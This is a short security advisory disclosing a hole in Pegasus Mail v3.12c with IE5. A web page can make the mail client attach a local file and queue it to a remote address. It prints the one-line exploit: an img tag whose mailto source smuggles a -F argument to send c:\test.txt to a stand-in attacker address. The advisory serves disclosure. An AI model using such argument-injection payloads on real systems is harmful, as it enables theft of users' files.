[ SOURCE: http://www.secureroot.com/security/advisories/9719820413.html ]

SUMMARY



The default setup of Pegasus Mail contains a remotely exploitable security

hole that allows a remote website to gain copies of files on the users hard

drive.



DETAILS



Version tested: Pegasus Mail v3.12c with IE5.0



When the webpage containing the exploit code is viewed using IE5,

Pegasus mail will automatically creates a message which has a copy

of the file "c:\test.txt" and is addressed to "hacker@hakersite.com" and

queues it ready to be sent without any further user intervention



If instead of "hacker@hakersite.com" we have a local user,

"hacker" the message won't be queued but just sent immediately.



Exploit code:



<img src="mailto:hacker@hakersite.com -F c:\test.txt">



Temporary Fix:



1) Don't run Pegasus Mail at the same time as a web browser



This is not a complete solution as Pegasus Mail will load up if the exploit

code is run, but this at least will be more noticable to the user.



Vendor:



As I earlier posted a message to vuln-dev giving the basics of this exploit

without the realizing the consequeces (at that stage the user had to click on

a link for the exploit to come into play), I have decided to publish the full

exploit before contacting the vendor.



--

Imran Ghory